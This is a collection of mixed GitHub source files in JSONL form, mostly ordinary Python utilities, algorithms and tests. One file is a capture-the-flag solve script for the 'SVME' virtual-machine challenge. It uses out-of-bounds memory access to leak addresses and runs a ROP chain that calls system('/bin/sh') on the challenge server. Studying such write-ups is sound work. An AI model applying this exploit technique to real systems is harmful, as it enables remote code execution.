nums:\n if n == 1:\n continue\n if n == 2:\n count += 1\n continue\n\n if eratosthenes(n):\n count += 1\n else:\n continue\n\n\nprint(count)","repo_name":"artists2/Algorithm","sub_path":"baekjoon/1978.py","file_name":"1978.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"38919818432","text":"import logging\nimport sys\nimport feedparser\n\n# ログの設定\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n# StreamHandlerの設定\nhandler = logging.StreamHandler(stream=sys.stdout)\nhandler.setLevel(logging.INFO)\n\n# ハンドラをロガーに追加\nlogger.addHandler(handler)\n\ndef get_all_entries(url):\n all_entries = []\n logger.info(f\"Fetching all entries from feed: {url}\")\n url = f\"{url}?all=1\"\n feed = feedparser.parse(url)\n entries = feed.entries\n if not entries:\n logger.info(f\"No more entries found. Exiting.\")\n else:\n for entry in entries:\n # 各エントリからcontentとlinkを抽出し、辞書に格納\n all_entries.append({'content': entry.summary, 'link': entry.link})\n\n return all_entries\n\ndef get_system_role_for_extracting_image_url():\n return \"\"","repo_name":"noriyukitakei/blog-tips-generator","sub_path":"entry_processor_zenn.py","file_name":"entry_processor_zenn.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"99"} +{"seq_id":"21159870798","text":"#!/usr/bin/env python3\n\"\"\"\nfichier principal pour la detection des inclusions.\nce fichier est utilise pour les tests automatiques.\nattention donc lors des modifications.\n\"\"\"\nimport sys\nfrom tycat import read_instance\nfrom tycat import tycat\nfrom geo.point import Point\nfrom geo.polygon import Polygon\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport csv\n\ndef air_poly_liste(polygones):\n \"\"\"\n Renvoie une liste de triplet (indice, polygones, air du polygone)\n \"\"\"\n return [[i, abs(polygones[i].area())] for i in range(len(polygones))]\n\ndef point_intersection(point, segment):\n \"\"\"\n Vérifie si la semi-droite verticale tracée vers le haut\n à partir du point intersecte le segment\n \"\"\"\n x_point = point.coordinates[0]\n x1, x2 = segment.endpoints[0].coordinates[0], segment.endpoints[1].coordinates[0]\n if segment.is_vertical() or x_point < min(x1, x2) or x_point >= max(x1, x2):\n return False\n\n if segment.endpoints[0].coordinates[1] < point.coordinates[1] and segment.endpoints[1].coordinates[1] < point.coordinates[1]:\n return True\n\n coeff, oao = segment.eq_droite()\n y_inter = coeff*x_point + oao\n if point.coordinates[1] > y_inter:\n return True\n return False\n\n\ndef point_dans_polygone(point, polygone):\n \"\"\"\n utilise l'algorithme du raycast fourni avec amélioration pour savoir si un point est dans un polygone\n \"\"\"\n count = 0 # Compteur du nombre de segments traversés\n\n for segment in polygone.segments():\n\n if point_intersection(point, segment):\n count += 1\n return bool(count%2) #on renvoie True si le nombre est impair, False si il est pair\n\n\ndef taille_diagonale_quadrant(quadrant):\n \"\"\"\n renvoie la taille de la diagonale d'une quadrant\n \"\"\"\n point_mini = Point(quadrant.min_coordinates)\n point_maxi = Point(quadrant.max_coordinates)\n return point_mini.distance_to(point_maxi)\n\ndef poly_indice_quadrant_diagonale(polygone, i):\n \"\"\"\n Renvoie le couple quadrant et diagonale de quadrant\n \"\"\"\n rectangle = polygone.bounding_quadrant()\n return [polygone, i, rectangle, taille_diagonale_quadrant(rectangle)]\n\n\ndef trouve_inclusions_naif(polygones):\n longueur = len(polygones)\n liste_resultat = [-1]*longueur\n for i in range(longueur): # On parcours tout les polygones\n polygones_sup = [] # Liste pour stocker tout les polygones dans le quel le ième polygone est inclus\n point_test = polygones[i].points[0] # On choisit un point test\n for j in range(longueur): # On parcourt tout les polygones\n if j != i: # sauf le ième pour verifier si ils contiennent ce dernier\n if point_dans_polygone(point_test, polygones[j]):\n polygones_sup += [j]\n if polygones_sup != []:\n # Détermine le polygone avec l'air la plus petite\n min_air, i_petit_poly = abs(polygones[polygones_sup[0]].area()), polygones_sup[0]\n for indice_poly in polygones_sup[1:]:\n air_poly = abs(polygones[indice_poly].area())\n if air_poly <= min_air:\n min_air, i_petit_poly = air_poly, indice_poly\n liste_resultat[i] = i_petit_poly # On stock l'indice du plus petit polygone dans les résultats\n return liste_resultat\n\n\ndef trouve_inclusions_air_quadrant(polygones):\n nb_polygones = len(polygones)\n liste_resultat = [-1]*nb_polygones\n #on trie les polygones par aire. En renvoyant la liste des triplet\n air_liste = sorted(air_poly_liste(polygones), key = lambda triplet: triplet[1])\n quadrant_liste = [poly.bounding_quadrant() for poly in polygones]\n for i in range(nb_polygones - 1, -1, -1): #on parcourt chacun des polygones\n point_test = polygones[air_liste[i][0]].points[0] #on choisit un point test\n for j in range(i+1, nb_polygones): #pour tous les polygones ayant une aire supérieure\n # On vérifie si les aires ne sont pas égales\n if air_liste[i][1] < air_liste[j][1]:\n # On vérifie déjà si les quadrants s'intersectent\n if quadrant_liste[air_liste[i][0]].intersect(quadrant_liste[air_liste[j][0]]):\n # On vérifie si le point est dans le polygone\n if point_dans_polygone(point_test, polygones[air_liste[j][0]]):\n liste_resultat[air_liste[i][0]] = air_liste[j][0] # On ajoute l'indice du polygone a la liste résultat\n break\n\n return liste_resultat\n\ndef trouve_inclusions_quadrant(polygones):\n nb_polygones = len(polygones)\n liste_resultat = [-1] * nb_polygones\n polygones_caracteristiques = [poly_indice_quadrant_diagonale(polygones[i], i) for i in range(nb_polygones)]\n polygones_caracteristiques.sort(key=lambda polygone_cara : polygone_cara[3])\n #desormais tries\n for i in range(nb_polygones -1):\n point_test = polygones_caracteristiques[i][0].points[0] #premier point du polygone\n\n for j in range(i + 1, nb_polygones):\n if polygones_caracteristiques[i][2].intersect(polygones_caracteristiques[j][2]):\n if polygones_caracteristiques[i][3] < polygones_caracteristiques[j][3]:\n if point_dans_polygone(point_test, polygones_caracteristiques[j][0]):\n liste_resultat[polygones_caracteristiques[i][1]] = polygones_caracteristiques[j][1]\n break\n\n return liste_resultat\n\n\ndef intersection_ligne(x_ligne, segment):\n \"\"\"\n Retourne l'ordonnée du point d'intersection s'il y a intersection\n \"\"\"\n coeff, oao = segment.eq_droite()\n y_inter = coeff*x_ligne + oao\n return y_inter\n\ndef orientation(segment):\n if segment.endpoints[0].coordinates[0] < segment.endpoints[1].coordinates[0]:\n return 1\n else:\n return -1\n\ndef polygones_quadrant(polygones):\n return [[polygone, polygone.bounding_quadrant()] for polygone in polygones]\n\n\ndef liste_intersection(x_ligne, polygones):\n \"\"\"\n Retourne la liste des couples (y_intersection, indice_poly, Bool_ajout)\n \"\"\"\n liste_intersec = []\n for i, (polygone, quadrant) in enumerate(polygones):\n if x_ligne < quadrant.min_coordinates[0] or x_ligne > quadrant.max_coordinates[0]:\n continue\n orientation_prec = 0\n for segment in polygone.segments():\n x1, x2 = segment.endpoints[0].coordinates[0], segment.endpoints[1].coordinates[0]\n if segment.is_vertical() or min(x1, x2) > x_ligne or max(x1, x2) < x_ligne:\n continue\n y0, y1 = segment.endpoints[0].coordinates[1], segment.endpoints[1].coordinates[1]\n if x_ligne == segment.endpoints[0].coordinates[0]:\n orientation_actuelle = orientation(segment)\n if orientation_prec == 0:\n orientation_prec = orientation_actuelle\n elif orientation_prec == -1:\n if orientation_actuelle == -1:\n liste_intersec += [[y0, i, True]]\n else:\n liste_intersec += [[y0, i, False]]\n orientation_prec = 0\n else:\n if orientation_actuelle == -1:\n liste_intersec += [[y0, i, False]]\n else:\n liste_intersec += [[y0, i, True]]\n orientation_prec = 0\n elif x_ligne == segment.endpoints[1].coordinates[0]:\n orientation_actuelle = orientation(segment)\n if orientation_prec == 0:\n orientation_prec = orientation_actuelle\n elif orientation_prec == -1:\n if orientation_actuelle == -1:\n liste_intersec += [[y1, i, True]]\n else:\n liste_intersec += [[y1, i, False]]\n orientation_prec = 0\n else:\n if orientation_actuelle == -1:\n liste_intersec += [[y1, i, False]]\n else:\n liste_intersec += [[y1, i, True]]\n orientation_prec = 0\n else:\n liste_intersec += [[intersection_ligne(x_ligne, segment), i, True]]\n return liste_intersec\n\n\ndef trouve_inclusions_ligne(polygones):\n nb_polygones = len(polygones)\n poly_croise = [False]*nb_polygones\n liste_resultat = [-1]*nb_polygones\n polygone_quadrant = polygones_quadrant(polygones)\n j = 0\n while j < nb_polygones and not(poly_croise[j]):\n liste_intersec = sorted(liste_intersection(polygones[j].points[0].coordinates[0], polygone_quadrant), key = lambda triplet: triplet[0])\n liste_eponge = []\n for y_intersec, i, ajout in liste_intersec:\n if liste_eponge == []:\n poly_croise[i] = True\n if ajout:\n liste_eponge.append(i)\n else:\n if i == liste_eponge[-1]:\n if ajout:\n liste_eponge.pop()\n else:\n liste_resultat[i] = liste_eponge[-1]\n poly_croise[i] = True\n if ajout:\n liste_eponge.append(i)\n j += 1\n while j < nb_polygones and poly_croise[j]:\n j += 1\n return liste_resultat\n\n\n\ndef tests_temps(function):\n \"\"\"\n Renvoie les temps selon le nombre de polygones\n \"\"\"\n nb_polygones = [500, 1000, 1500, 2000, 2500, 3000, 3500, 4000,\\\n 10000, 20000, 30000, 40000]\n temps = []\n for nb in nb_polygones:\n fichier = \"tests/polygons/\" + sys.argv[1] + \"-\" + str(nb) + \".poly\"\n polygones = read_instance(fichier)\n start_time = time.time()\n function(polygones)\n temps += [time.time() - start_time]\n return(nb_polygones, temps)\n\n\ndef tests_temps_csv():\n \"\"\"\n Renvoie les temps en les cherchant dans le .csv\n \"\"\"\n fname = sys.argv[1]\n file = open(fname, \"r\")\n temps = []\n nb_polygones = []\n reader = csv.reader(file)\n next(reader)\n for ligne in reader:\n valeur = ligne[0].split('-')[1]\n nb, ok, tmps = valeur.split(';')\n nb_polygones.append(int(nb))\n temps.append(float(tmps))\n file.close()\n return (nb_polygones, temps)\n\n\ndef trace_graphique():\n x, y1 = tests_temps_csv()\n # y2 = tests_temps(trouve_inclusions_naif)[1]\n # y3 = tests_temps(trouve_inclusion_test)[1]\n plt.plot(x, y1, label=\"avec aires\")\n # plt.plot(x, y2, label=\"Naif\")\n # plt.plot(x, y3, label=\"sans aires\")\n plt.title(\"Mesure de performances\")\n plt.xlabel(\"Nombre de polygones\")\n plt.ylabel(\"Temps\")\n plt.legend()\n plt.show()\n\n\ndef main():\n \"\"\"\n charge chaque fichier .poly donne\n trouve les inclusions\n affiche l'arbre en format texte\n \"\"\"\n # trace_graphique()\n for fichier in sys.argv[1:]:\n polygones = read_instance(fichier)\n # inclusions = trouve_inclusions_ligne(polygones)\n tycat(polygones)\n # print(inclusions)\n # for fichier in sys.argv[1:]:\n # polygones = read_instance(fichier)\n # start_time = time.time()\n # inclusions_bis = trouve_inclusions_bis(polygones)\n # temps_bis = time.time() - start_time\n # print(\"Résultats algo bis:\", inclusions_bis)\n # print(\"Temps algo bis:\", temps_bis)\n # start_time = time.time()\n # inclusions = trouve_inclusions_quadrant(polygones)\n # temps = time.time() - start_time\n # print(\"Résultats algo normal:\", inclusions)\n # print(\"Temps algo normal:\", temps)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AndriyParkho/polygone_included","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11889,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10699448092","text":"from numpy.core import numeric\nimport pytest\nimport pandas as pd\n\nfrom shmapy.hex_shmap import us_plot_hex\n\nstates_to_test = [\"CA\", \"MD\", \"PA\", \"TX\"]\n\n\n@pytest.mark.parametrize(\n \"filename,chart_type,show_figure\",\n [\n (\"tests/data/demo_input1.csv\", \"vbar\", False),\n (\"tests/data/demo_input2.csv\", \"choropleth\", False),\n (\"tests/data/demo_input3.csv\", \"vbar\", False),\n (\"tests/data/demo_input4.csv\", \"vbar\", False),\n (\"tests/data/demo_input5.csv\", \"categorical\", False),\n (\"tests/data/demo_input6.csv\", \"choropleth\", False),\n ],\n)\ndef test_hex_shmap_default(filename, chart_type, show_figure):\n us_plot_hex(filename, chart_type=chart_type, show_figure=show_figure)\n assert 1 == 1\n\n\n@pytest.mark.parametrize(\n \"filename,numeric_labels,numeric_labels_custom\",\n [\n (\"tests/data/demo_input1.csv\", \"all\", None),\n (\"tests/data/demo_input2.csv\", states_to_test, None),\n (\"tests/data/demo_input4.csv\", None, \"fruit\"),\n ],\n)\ndef test_hex_vbar_custom(filename, numeric_labels, numeric_labels_custom):\n us_plot_hex(\n filename,\n chart_type=\"vbar\",\n numeric_labels=numeric_labels,\n numeric_labels_custom=numeric_labels_custom,\n show_figure=False,\n )\n assert 1 == 1\n\n\n@pytest.mark.parametrize(\n \"filename,numeric_labels,numeric_labels_custom\",\n [\n (\"tests/data/demo_input1.csv\", \"all\", None),\n (\"tests/data/demo_input2.csv\", states_to_test, None),\n (\"tests/data/demo_input4.csv\", None, \"fruit\"),\n ],\n)\ndef test_hex_choropleth_custom(filename, numeric_labels, numeric_labels_custom):\n us_plot_hex(\n filename,\n chart_type=\"choropleth\",\n numeric_labels=numeric_labels,\n numeric_labels_custom=numeric_labels_custom,\n show_figure=False,\n )\n assert 1 == 1\n\n\n@pytest.mark.parametrize(\n \"filename,fill_color,category_labels\",\n [\n (\n \"tests/data/demo_input5.csv\",\n [\"#ef476f\", \"#ffd166\", \"#06d6a0\", \"#118ab2\", \"black\",],\n None,\n ),\n (\n \"tests/data/demo_input5.csv\",\n [\"#ef476f\", \"#ffd166\", \"#06d6a0\", \"#118ab2\", \"black\",],\n [\"Apple\", \"Banana\", \"Cherry\", \"Durian\", \"Elderberry\"],\n ),\n ],\n)\ndef test_hex_categorical_custom(filename, fill_color, category_labels):\n us_plot_hex(\n filename,\n chart_type=\"categorical\",\n fill_color=fill_color,\n category_labels=category_labels,\n show_figure=False,\n )\n assert 1 == 1\n","repo_name":"mpkrass7/shmapy","sub_path":"tests/test_hex_shmap.py","file_name":"test_hex_shmap.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"99"} +{"seq_id":"72083482566","text":"import turtle\n\ns = turtle.Screen()\nt = turtle.Turtle()\n\nfor x in range(4):\n t.fd(100)\n t.rt(90)\n\n\nt.speed(10)\nx = 200\nwhile x >= 10:\n t.circle(x)\n x = x-10\n\n\n\nturtle.done()\n","repo_name":"egiam/Programming-and-Learning","sub_path":"Python/Curso de Udemy python/9.6 TurtleAuto.py","file_name":"9.6 TurtleAuto.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"33580843644","text":"from GeneralGraph import GeneralGraph as gg\nfrom Gliffs import gliffs as gliffs\nimport json\nimport csv\n\n\ndef build_from_edges_in_csv(filename, from_id, to_id):\n g = gg.GeneralGraph()\n with open(filename, 'r') as csvfile:\n reader = csv.DictReader(csvfile, delimiter=\",\")\n for row in reader:\n g.add_edge({\"_id\": row[from_id], \"data\": {}}, {\"_id\": row[to_id], \"data\": {}})\n return g\n####\n## Some tests\n#g = gg.GeneralGraph()\n#n1 = {\"_id\": \"first node\"}\n#n2 = {\"_id\": \"quick node three\", \"data\":[]}\n#n3 = {\"_id\": \"quick node four\", \"data\":[\"a\", \"b\", \"c\"]}\n#n4 = {\"_id\": \"quick sink\"}\n#n0 = {\"_id\": \"two\", \"data\":[]}\n#g.add_node(n1).add_node(n0)\n#g.add_edge({\"_id\": \"quick node 1\"},{\"_id\": \"quick node two\", \"data\":[]}, edge_data={})\\\n# .add_edge(n1, n2, edge_meaning=\"WORKS WITH\", edge_data={})\\\n# .add_edge(n1, n2, edge_meaning=\"WORKS WITH\", edge_data={\"some\": \"data\"})\\\n# .add_edge(n1, n3, edge_meaning=\"LIKES\")\\\n# .add_edge(n3, n4)\\\n# .add_edge(n0, n4)\n#\ng = build_from_edges_in_csv(\"/Users/simonshapiro/DataToGliffy/data/test.csv\", \"FROM\", \"TO\")\n#Attach gliffs based on some data on node and edge\nfor node in g.nodes.values():\n gnode = gliffs.GNode(node[\"_assignedItemId\"], description=node[\"_id\"], shape=gliffs.GLIFFY_SHAPES.COMPONENT)\n node[\"_gliff\"] = gnode\nfor edge in g.edges.values():\n gline = gliffs.GLine(edge[\"_assignedItemId\"], edge[\"_fromNode\"][\"_assignedItemId\"], edge[\"_toNode\"][\"_assignedItemId\"], edge[\"_edgeMeaning\"])\n edge[\"_gliff\"] = gline\n###\n#Layout the diagram\ndiagram = gliffs.GliffyDiagram()\ng = g.layout_using_grandalf()\ngliph_list = [node[\"_gliff\"].gliph for node in g.nodes.values()] + [edge[\"_gliff\"].gliph for edge in g.edges.values()]\ndiagram.diagram[\"stage\"][\"objects\"] = gliph_list\nprint(json.dumps(diagram.diagram))\npass","repo_name":"SimonShapiro/DataToGliffy","sub_path":"src/overview.py","file_name":"overview.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"12955551093","text":"#!/usr/bin/env python3\n\nfrom pwn import *\n\nthe_binary = \"./svme\"\n# the_binary = \"./svme.dbg\"\ncontext.binary = the_binary\nelf = context.binary\nlibc = ELF(\"./libc-2.31.so\", checksec=False)\n\ncontext.terminal = [\"tmux\", \"splitw\", \"-v\"]\n\nif args.REMOTE:\n io = remote(\"47.243.140.252\", 1337)\nelif args.STRACE:\n io = process([\"strace\", \"-o\" ,\"strace.txt\", the_binary])\nelif args.LTRACE:\n io = process([\"ltrace\", \"-o\", \"ltrace.txt\", the_binary])\nelse:\n io = process(the_binary)\n\nif args.GDB:\n gdb.attach(io, f\"\"\"\n file {the_binary}\n\n # Opcode jump table statement in vm_exec.\n # pie break *0x13a5\n\n # Return from vm_exec.\n pie break *0x19c0\n\n continue\n \"\"\")\n\nclass Opcodes:\n noop = 0\n iadd = 1 # int add\n isub = 2\n imul = 3\n ilt = 4 # int less than\n ieq = 5 # int equal\n br = 6 # branch\n brt = 7 # branch if true\n brf = 8 # branch if true\n iconst = 9 # push constant integer\n load = 10 # load from local context\n gload = 11 # load from global memory\n store = 12 # store in local context\n gstore = 13 # store in global memory\n print_ = 14 # print stack top\n pop = 15 # throw away top of stack\n call = 16 # call function at address with nargs,nlocals\n ret = 17 # return value from function\n halt = 18\n\nclass Const:\n max_program_size = 128\n\nclass Offsets:\n vm_first_stack_frame_locals_to_vm_globals = 0x116c // 4\n\n vm_globals_to_its_own_ptr = -0x20f0 // 4\n vm_globals_to_stack_ptr = -0x2100 // 4\n\n vm_first_stack_frame_to_overwrite_vm_globals_ptr = -0xf84 // 4\n\n stack_ptr_on_heap_to_main_ptr = 0x238 // 4\n stack_ptr_to_vm_exec_return_ptr = -0x28 // 4\n stack_ptr_to_stored_libc_start_main_ptr = 0x218 // 4\n\ndef signed_int32(i):\n return u32(p32(i), signed=True)\n\ndef split_qword(qword):\n upper_dword = (qword >> 0x20) & 0xffffffff\n upper_dword = signed_int32(upper_dword)\n\n lower_dword = qword & 0xffffffff\n lower_dword = signed_int32(lower_dword)\n\n return upper_dword, lower_dword\n\ndef set_vm_globals_ptr_from_stack():\n \"\"\"Set the vm->globals pointer from the top two dwords on the vm stack.\"\"\"\n return [\n Opcodes.store, Offsets.vm_first_stack_frame_to_overwrite_vm_globals_ptr+1,\n Opcodes.store, Offsets.vm_first_stack_frame_to_overwrite_vm_globals_ptr,\n ]\n\ndef gstore_qword(offset):\n return [\n Opcodes.gstore, offset+1,\n Opcodes.gstore, offset,\n ]\n\ndef gload_qword(offset):\n return [\n Opcodes.gload, offset,\n Opcodes.gload, offset+1,\n ]\n\ndef set_vm_globals_ptr_imm(qword):\n \"\"\"Set the vm->globals pointer to an immediate qword.\"\"\"\n upper_dword, lower_dword = split_qword(qword)\n return [\n Opcodes.iconst, upper_dword,\n Opcodes.store, Offsets.vm_first_stack_frame_to_overwrite_vm_globals_ptr+1,\n Opcodes.iconst, lower_dword,\n Opcodes.store, Offsets.vm_first_stack_frame_to_overwrite_vm_globals_ptr,\n ]\n\ndef compile_program(program_opcodes):\n assert len(program_opcodes) <= Const.max_program_size\n for i in range(Const.max_program_size - len(program_opcodes)):\n program_opcodes.append(Opcodes.noop)\n\n return b\"\".join(p32(i, signed=True) for i in program_opcodes)\n\ndef parse_next_leaked_qword():\n io.recvuntil(\": print\")\n upper_dword = int(io.recvuntil(\"\\n\", drop=True))\n upper_dword = u32(p32(upper_dword, signed=True))\n\n io.recvuntil(\": print\")\n lower_dword = int(io.recvuntil(\"\\n\", drop=True))\n lower_dword = u32(p32(lower_dword, signed=True))\n\n return (upper_dword << 0x20) | lower_dword\n\nleaker_program = [\n # Load a stack address from the heap onto the top of the vm stack and print it.\n *gload_qword(Offsets.vm_globals_to_stack_ptr),\n Opcodes.print_,\n Opcodes.print_,\n\n # Load the stack address onto the top of the vm stack again.\n *gload_qword(Offsets.vm_globals_to_stack_ptr),\n\n # Overwrite the vm->globals pointer with the stack address.\n *set_vm_globals_ptr_from_stack(),\n\n # Load the stored __libc_start_main address onto the vm stack and print it.\n *gload_qword(Offsets.stack_ptr_to_stored_libc_start_main_ptr),\n Opcodes.print_,\n Opcodes.print_,\n\n # Load the address of main onto the vm stack and print it.\n *gload_qword(Offsets.stack_ptr_on_heap_to_main_ptr),\n Opcodes.print_,\n Opcodes.print_,\n\n # Load the address of main onto the vm stack again.\n *gload_qword(Offsets.stack_ptr_on_heap_to_main_ptr),\n\n # Store the address of main over the real program's vm_exec stored return address.\n *gstore_qword(Offsets.stack_ptr_to_vm_exec_return_ptr),\n\n # Trigger return from vm_exec.\n Opcodes.halt,\n]\nio.send(compile_program(leaker_program))\n\nstack_leak = parse_next_leaked_qword()\nlog.info(\"Stack leak: %#x\" % stack_leak)\n\nlibc_leak = parse_next_leaked_qword()\nlog.info(\"libc leak: %#x\" % libc_leak)\nlibc.address = libc_leak - 0x270b3\nlog.info(\"libc base: %#x\" % libc.address)\nlibc_bin_sh = next(libc.search(b\"/bin/sh\\x00\"))\nlog.info(\"Using libc /bin/sh string at %#x\" % libc_bin_sh)\n\nelf_leak = parse_next_leaked_qword()\nlog.info(\"ELF leak: %#x\" % elf_leak)\nelf.address = elf_leak - 0x1c7b\nlog.info(\"ELF base: %#x\" % elf.address)\n\n# We send another program that overwrites the vm_exec stack with a ROP chain.\nrop_chain = [\n libc.address + 0x0000000000026b72, # pop rdi; ret\n libc_bin_sh,\n libc.sym.system,\n]\n\nexec_program = set_vm_globals_ptr_imm(stack_leak - 0x260)\nrop_offset = 0\nfor rop_qword in rop_chain:\n rop_upper_dword, rop_lower_dword = split_qword(rop_qword)\n\n exec_program.extend([\n Opcodes.iconst, rop_lower_dword,\n Opcodes.iconst, rop_upper_dword,\n ])\n exec_program.extend(gstore_qword(rop_offset))\n rop_offset += 2\nexec_program.append(Opcodes.halt)\n\nio.send(compile_program(exec_program))\nio.interactive()\n","repo_name":"welchbj/ctf","sub_path":"writeups/2022/RealWorldCTF/SVME/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":5902,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"99"} +{"seq_id":"6740526604","text":"N = int(input('введите число: '))\n\nif N >= 2:\n l = [0]\n while(True):\n if 2 ** (l[-1] + 1) <= N:\n l.append(l[-1] + 1)\n else:\n break\n print(l)\nelse:\n print('нет подходящих степеней')","repo_name":"Nichitalik/python_GB","sub_path":"python_HomeWork2/task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"24214887704","text":"number = int(input())\nflag = True\ncounter = 0\n\nfor i in range(1, number + 1):\n for j in range(1, i + 1):\n counter += 1\n print(f\"{counter} \", end=\"\")\n if counter == number:\n flag = False\n break\n if not flag:\n break\n print()\n","repo_name":"EmilMominski/python_basics","sub_path":"Programming Basics/1. Python Basics/6. Nested Loops/Exercise/1_number_pyramid.py","file_name":"1_number_pyramid.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"8952212371","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'post'\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('new_mood/', views.new_mood, name='new_mood'),\n path('remove_mood//', views.remove_mood, name='remove_mood'),\n path('edit_mood//', views.edit_mood, name='edit_mood')\n]\n","repo_name":"nguyenanhdocode/mood","sub_path":"post/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10317933467","text":"from typing import Optional, Dict, List, Any\nfrom itertools import product\nfrom paper.experiments.global_variables import TRAINING_DATASET_FRACTIONS\n\n\n########################################################################################################################\n# 4. APP.G.3 (Variants: Constant cool-down)\n########################################################################################################################\ndef experiments_variants_constant(exp_filter: Optional[Dict[str, float]] = None) -> List[Dict[str, Any]]:\n exp = [\n {\n \"experiment_name\": f\"exp_4_c{c}_x{x}_p{patience}\",\n \"a\": \"adaptive\",\n \"s\": \"bio\",\n \"c\": c,\n \"x\": x,\n \"prune_ratio_val\": x,\n \"lr_cooldown_epochs\": 0,\n \"patience\": patience,\n }\n for c, x, patience in product([\"II\", \"III\"], TRAINING_DATASET_FRACTIONS, [5, 7, 9])\n if (\"c\" not in exp_filter or c == exp_filter[\"c\"])\n and (\"x\" not in exp_filter or x == exp_filter[\"x\"])\n ]\n print(f\"4. EXPERIMENTS_VARIANTS_CONSTANT: {len(exp)} = \"\n f\"2 x {len(TRAINING_DATASET_FRACTIONS)} x 3\")\n return exp\n","repo_name":"flxst/nerblackbox","sub_path":"paper/experiments/experiments_appG3.py","file_name":"experiments_appG3.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"99"} +{"seq_id":"11505832013","text":"# Test the support for extension fields.\n\nImport(\"env\")\n\n# We use the files from the alltypes test case\nincpath = env.Clone()\nincpath.Append(PROTOCPATH = '$BUILD/alltypes')\nincpath.Append(CPPPATH = '$BUILD/alltypes')\n\nincpath.NanopbProto([\"extensions\", \"extensions.options\"])\nenc = incpath.Program([\"encode_extensions.c\", \"extensions.pb.c\", \"$BUILD/alltypes/alltypes.pb$OBJSUFFIX\", \"$COMMON/pb_encode.o\", \"$COMMON/pb_common.o\"])\ndec = incpath.Program([\"decode_extensions.c\", \"extensions.pb.c\", \"$BUILD/alltypes/alltypes.pb$OBJSUFFIX\", \"$COMMON/pb_decode.o\", \"$COMMON/pb_common.o\"])\n\nenv.RunTest(enc)\nenv.RunTest([dec, \"encode_extensions.output\"])\n\n","repo_name":"nanopb/nanopb","sub_path":"tests/extensions/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":3808,"dataset":"github-code","pt":"99"} +{"seq_id":"12491991444","text":"# coding:utf-8\r\n__author__ = \"superlaker\"\r\n__date__ = '2019/4/29 15:33'\r\n\r\n\"\"\"\r\ntimeout\r\nretry\r\nmethod\r\n\"\"\"\r\nimport requests\r\nfrom retrying import retry\r\n\r\nheaders = {}\r\n\r\n\r\n@retry(stop_max_attempt_number=3) # 三次出错抛出异常\r\ndef _parse_url(url, method, data, proxies):\r\n print(\"*\" * 20)\r\n if method == \"POST\":\r\n response = requests.post(url, data=data, headers=headers, proxies=proxies)\r\n\r\n else:\r\n response = requests.get(url, data=data, headers=headers, proxies=proxies)\r\n\r\n assert response.status_code == 200\r\n return response.content.decode()\r\n\r\n\r\ndef parse_url(url, method=\"GET\", data=None, proxies=None):\r\n try:\r\n html_str = _parse_url(url, method, data, proxies)\r\n except:\r\n html_str = None\r\n return html_str\r\n\r\n\r\nif __name__ == '__main__':\r\n url = \"http://www.baidussss.com\"\r\n url1 = \"http://www.baidu.com\"\r\n\r\n print(parse_url(url1))\r\n","repo_name":"lcdy/django_resume","sub_path":"static_media/static/markdown/python基础/06 net_spider/code/AI_timeout.py","file_name":"AI_timeout.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11512129355","text":"from PIL import ImageGrab\r\nimport time\r\nfrom pynput.mouse import Button, Controller\r\nimport keyboard\r\nimport win32api\r\nimport win32con\r\n\r\nmouse = Controller()\r\navg_time = 0.0\r\nthrow_time = 0.0\r\ncatch_time = 0.0\r\ntime_to_catch = 0.0\r\ntotal_time = 0.0\r\ncatch_number = 0\r\ntime_to_catch_string = \"\"\r\navg_time_string = \"\"\r\ncatch_number_string = \"\"\r\nexit_key = \"ctrl\"\r\nmouse_move_dir = True\r\n\r\n\r\ndef right_click():\r\n mouse.press(Button.right)\r\n mouse.release(Button.right)\r\n\r\n\r\nresolution = int(input(\"Resolution - 1920 × 1080, enter 0. For 2560 × 1440, enter 1. \"))\r\nwindow_scaling = int(input(\"Scaling - 100%, enter 0. For 125%, enter 1. \"))\r\nmove_mouse = bool(input(\"Enter any text to move the mouse while fishing. Skip to not move the mouse. \"))\r\n\r\nif resolution == 0:\r\n res = \"1920 × 1080\"\r\n if window_scaling == 0:\r\n x1, y1, x2, y2 = 1830, 948, 1832, 951\r\n scale = \"100%\"\r\n else:\r\n x1, y1, x2, y2 = 1819, 912, 1823, 914\r\n scale = \"125%\"\r\nelse:\r\n x1, y1, x2, y2 = 2470, 1309, 2472, 1311\r\n res = \"2560 × 1440\"\r\n scale = \"100%\"\r\n\r\nsetup_detect = ImageGrab.grab(bbox=(x1, y1, x2, y2))\r\nsetup_detect_rgb = setup_detect.convert(\"RGB\")\r\ninitial_r, initial_g, initial_b = 